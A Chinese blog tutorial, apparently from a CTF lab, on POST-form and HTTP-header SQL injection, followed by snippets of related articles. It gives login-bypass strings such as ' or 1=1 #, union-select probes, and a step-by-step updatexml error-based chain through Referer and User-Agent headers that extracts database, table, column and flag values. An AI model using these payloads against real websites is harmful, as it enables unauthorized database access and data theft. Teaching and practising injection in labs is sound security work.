POST注入与Head注入

最新推荐文章于 2024-05-21 08:03:35 发布
原创 最新推荐文章于 2024-05-21 08:03:35 发布 · 312 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL注入中的POST注入与Head注入技术,包括如何通过不同的HTTP请求方法寻找和利用潜在的SQL注入漏洞,如使用闭合符号触发异常、万能密码尝试、以及利用updatexml函数等高级技巧。

POST注入与Head注入

POST注入

post注入与get注入的区别在于表单的传递方式,无本质差别

get传参通过url编码,使用?来标识,数据量有限

post注入一般对输入框进行传参,数据量比较大

  1. 查询是否有注入点

    对输入框填入一些闭合的符号,看页面是否异常
    例如: ’ " ') ")

  2. 尝试使用万能密码

    admin或123465或 ’ or 1=1 #

  3. post注入

    ' or 1=1 order by 1
' or 1=2 union select 1,2,3#

    接下来的步骤与get注入类似

Head注入

  1. 报错注入原理

    登录成功后通过brup抓包,将标记字段中的内容替换为updatexml函数,通过sql报错来显示我们要查询的内容

在这里插入图片描述

​ updatexml() 更新xml文档的函数

在这里插入图片描述
在这里插入图片描述

#号前闭合,后注释

在这里插入图片描述

用and的时候,前面的错了,则后面的不执行;前面的对了,则后面的执行;
用or的时候,前面的对了,则后面的不执行;前面的错了,则后面的执行;

sql语句在concat中可以被执行,16进制也能自动转义 0x7e为~符号 在upxml函数中加入特殊符号使其报错

可能的注入点 referer: user-agent: x-forwarded-for

  1. 登录成功后抓包

在这里插入图片描述

由此判断存在head注入,并且insert into 可能有两个字段

  1. 通过updatexml函数获取库名

    updatexml(123,concat('~',(select database())),123)
'or updatexml(1,concat(0x7e,(select database())),1),1)#

在这里插入图片描述

  1. 查询表名

    ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #

  2. 查询字段名

    ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #

  3. 查询数据拿到flag

    ' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
SQL注入——POST注入 HEAD注入
weixin_41487522的博客
04-10 839
SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是GET会。 POST注入高危点: 登录框 查询框 各种数据库有交互的框 最经典的POST注入莫过于万能密码: ’ or 1=1# 万能密码原理: se...
POST注入
笔墨稠思
11-06 794
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现会先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 1629
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
记web学习之sql注入
weixin_45508323的博客
11-22 1317
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
POST注入/HEAD注入
cutjgh的博客
05-20 492
POST注入(本质是SQL注入POST注入就是使用POST进行传参的注入,本质上GET注入没有任何区别,注入语句在各种框里 在真实站点上,POST注入比GET注入POST注入高入点: 登录框 查询框 等各种和数据库有交互的框 表单在有些时候是GET传参 HEAD注入 HEAD注入 抓取的包中User_Agent,Referer,X_FORWARDED_FOR等都可能存在注入 实际上头注入就是将请求头中的数据放入数据库当作命令执行 updatexml() 更新xml文档的函数(当然还有别的报错函数,
POST注入HEAD注入
weixin_45634365的博客
02-27 1090
一、POST注入 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别。 SQL注入的原理 渗透测试常用工具 #最经典的POST注入——万能密码 $password=' or 1=1 -- qwe $password=' or 1=1# #POST注入GET注入差别不大 #POST注入比GET注入多得多 #查看字段数 $password=' or 1=1 order by 3 -- qwe #判断回显点 $password=' union select 1,2,3 -- qwe
四、注入(3)POST注入/HEAD注入
weixin_45540609的博客
04-15 571
一、POST注入 POST注入和GET注入没有区别,只是传参不同 方法一:手工注入 1、猜字段 2、查找回显点 3、根据数据库自带表information_schema和columns查找数据表和字段 4、查找数据 详细内容见 文章 四、注入(1)SQL注入原理分析 https://blog.youkuaiyun.com/weixin_45540609/article/details/115695687 这篇文章的内容其实就是GET注入 方法二、sqlmap注入 (1)只使用sql...
SQL注入——POST注入HEAD注入
weixin_46601374的博客
02-25 1847
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
网络安全从入门到精通(第四章-2)GET&POST&HEAD注入
weixin_43643758的博客
03-29 590
本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http://www.xxx.com/new.php?id=1 and 1=1 页面显示正常。         http:...
post注入
quan9i的博客
01-04 5857
post注入(sql-lab11-18)
⑨Mysql POST注入
熊俊坤的博客
11-15 4940
POST方法起初是用来向服务器输入数据的。实际上,通常会用POST方法来支持HTML的表单。表单中填好数据通常会被送到服务器,然后由服务器将其发送到它要去的地方(比如,送到一个服务器网关程序中,然后由这个程序对其进行处理)。如图所示,显示的是一个用POST方法发起HTTP请求——像服务器发送表单数据——的客户端。
web安全入门(第四章-3)POST注入HEAD注入
Yzz_的博客
05-22 829
一、POST注入介绍 注入攻击的本质,是把用户输入的数据当作代码执行。 有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据。 POST注入属于诸如的一种,相信大家在之前的课程中都知道post\get两种传参方式。 POST注入就是使用post进行传参的注入,本质上和get类型的没什么区别。 POST注入高危点: 登录框 查询框 等各种和数据库有交互的框 万能密码:admin/'or 1=1 POST注入HEA
SQL注入POST注入
weixin_43765321的博客
03-03 4093
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
关于POST注入
qq_45342243的博客
10-15 2463
##### 一、进行闭合 输入’ or 1=1 # 然后回车 登录如下图所示: ##### 二、判断字段数 ’ or 1=1 order by 3 # 页面显示正常 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RsDRo6Rt-1634291776379)(https://nc0.cdn.zkaq.cn/md/11311/5e0db6f2cbc6abe0f6708064a7286936_43520.png)] ’ or 1=1 order by 4 # 页面显示异常。
SQL-Post注入
Code-5的博客
04-17 697
在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。在输入正确的用户名和密码后显示尝试会不会回显报错信息,输入admin'--+,回显报错了。尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。尝试联合注入显示数据库名了。
POST注入(一)
qq_45300786的博客
07-04 9581
POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:     1;判断是否存在sql注入漏洞。     2;判断网页存在字段数。     3;判断回显点。     4;获取信息。   测试开始:     测试目标获取管理员账号密码 GET/POST 区别: GET传参的数据有限,比较少 POST传参的数据可以比较大 可以达到很多效果 —— 文件上传 GET传参会经过URL编码 POST不会URL编码,比如注释符号:#的UR
ASPAJAX POST实现整数加法教程
Get方法不同,Post方法通常用于发送大量数据,并且这些数据不会显示在URL中。因此,Post方法更加安全,特别适合用来提交表单数据。 ASP结合AJAX Post实现整数加法的过程涉及到客户端(通常是一个HTML页面)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值